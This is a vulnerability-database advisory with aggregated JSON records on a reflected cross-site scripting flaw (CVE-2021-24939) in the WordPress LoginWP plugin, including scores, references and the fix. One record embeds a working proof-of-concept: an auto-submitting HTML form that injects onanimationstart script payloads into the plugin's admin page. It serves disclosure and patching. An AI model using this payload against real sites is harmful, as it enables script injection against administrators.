Description
A Reflected Cross-Site Scripting (XSS) vulnerability, discovered by JrXnm, affects the WordPress LoginWP plugin (versions <= 3.0.0.4).
## Solution
Update the WordPress LoginWP plugin to the latest available version (3.0.0.5 or later).
Affected Software
Related
{"id": "PATCHSTACK:F492B24FE05DEE1497854B03B608F368", "vendorId": null, "type": "patchstack", "bulletinFamily": "software", "title": "WordPress LoginWP plugin <= 3.0.0.4 - Reflected Cross-Site Scripting (XSS) vulnerability", "description": "Reflected Cross-Site Scripting (XSS) vulnerability discovered by JrXnm in WordPress LoginWP plugin (versions <= 3.0.0.4).\n\n## Solution\n\n\r\n Update the WordPress LoginWP plugin to the latest available version (at least 3.0.0.5).\r\n ", "published": "2021-11-08T00:00:00", "modified": "2021-11-08T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 4.3}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://patchstack.com/database/vulnerability/peters-login-redirect/wordpress-loginwp-plugin-3-0-0-4-reflected-cross-site-scripting-xss-vulnerability", "reporter": "JrXnm", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24939", "https://wpscan.com/vulnerability/1a46cfec-24ad-4619-8579-f09bbd8ee748", "https://wordpress.org/plugins/peters-login-redirect/#developers"], "cvelist": ["CVE-2021-24939"], "immutableFields": [], 
"lastseen": "2022-06-01T19:28:50", "viewCount": 6, "enchantments": {"score": {"value": 2.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24939"]}, {"type": "wpexploit", "idList": ["WPEX-ID:1A46CFEC-24AD-4619-8579-F09BBD8EE748"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:1A46CFEC-24AD-4619-8579-F09BBD8EE748"]}]}, "affected_software": {"major_version": [{"name": "peter's login redirect", "version": 3}]}, "epss": [{"cve": "CVE-2021-24939", "epss": "0.000820000", "percentile": "0.333650000", "modified": "2023-03-19"}], "vulnersScore": 2.0}, "_state": {"score": 1698845847, "dependencies": 1660004461, "affected_software_major_version": 1666695388, "epss": 1679290575}, "_internal": {"score_hash": "b2248d299d7f1ca7da1887f88ef7af13"}, "affectedSoftware": [{"version": "3.0.0.4", "operator": "le", "name": "peter's login redirect"}], "vendor_cvss": {"score": "3.1", "severity": "Medium severity"}, "owasp": "A7: Cross-Site Scripting (XSS)", "classification": "Cross Site Scripting (XSS)"}
{"cve": [{"lastseen": "2023-11-27T14:38:59", "description": "The LoginWP (Formerly Peter's Login Redirect) WordPress plugin before 3.0.0.5 does not sanitise and escape the rul_login_url and rul_logout_url parameter before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting issue", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-12-06T16:15:00", "type": "cve", "title": "CVE-2021-24939", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24939"], "modified": "2021-12-06T21:27:00", "cpe": [], "id": "CVE-2021-24939", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24939", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "prion": [{"lastseen": "2023-11-22T00:40:57", "description": "The LoginWP (Formerly Peter's Login Redirect) WordPress plugin before 3.0.0.5 does not sanitise and escape the rul_login_url and rul_logout_url parameter before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting issue", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": 
{"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-12-06T16:15:00", "type": "prion", "title": "Cross site scripting", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24939"], "modified": "2021-12-06T21:27:00", "id": "PRION:CVE-2021-24939", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-24939", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cnvd": [{"lastseen": "2022-11-05T07:59:22", "description": "WordPress is the WordPress Foundation's suite of blogging platforms developed using the PHP language. The platform supports the hosting of personal blogging sites on servers with PHP and MySQL. WordPress LoginWP plugin has a cross-site scripting vulnerability in versions prior to 3.0.0.5, which stems from a lack of data validation filtering of user-supplied data and output. 
An attacker could exploit the vulnerability to execute JavaScript code on the client side.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-12-09T00:00:00", "type": "cnvd", "title": "WordPress LoginWP plugin cross-site scripting vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24939"], "modified": "2021-12-10T00:00:00", "id": "CNVD-2021-95951", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2021-95951", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpexploit": [{"lastseen": "2022-01-17T19:25:27", "description": "The plugin does not sanitise and escape the rul_login_url and rul_logout_url parameter before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting issue\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", 
"userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-11-08T00:00:00", "type": "wpexploit", "title": "LoginWP < 3.0.0.5 - Reflected Cross-Site Scripting", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24939"], "modified": "2021-11-08T07:42:09", "id": "WPEX-ID:1A46CFEC-24AD-4619-8579-F09BBD8EE748", "href": "", "sourceData": "<html>\r\n <body>\r\n <form action=\"https://example.com/wp-admin/admin.php?page=loginwp-redirections&new=1\" id=\"hack\" method=\"POST\">\r\n <input type=\"hidden\" name=\"rul_login_url\" value='\" style=animation-name:rotation onanimationstart=alert(/XSS-login_url/)//' />\r\n <input type=\"hidden\" name=\"rul_logout_url\" value='\" style=animation-name:rotation onanimationstart=alert(/XSS-logout_url/)//' />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n <script>\r\n var form1 = document.getElementById('hack');\r\n form1.submit();\r\n</script>\r\n</html>", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpvulndb": [{"lastseen": "2022-01-17T19:25:27", "description": "The plugin does not sanitise and escape the rul_login_url and rul_logout_url parameter before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting issue\n\n### PoC\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-11-08T00:00:00", "type": "wpvulndb", "title": "LoginWP < 3.0.0.5 - Reflected Cross-Site Scripting", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24939"], "modified": "2021-11-08T07:42:09", "id": "WPVDB-ID:1A46CFEC-24AD-4619-8579-F09BBD8EE748", "href": "https://wpscan.com/vulnerability/1a46cfec-24ad-4619-8579-f09bbd8ee748", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}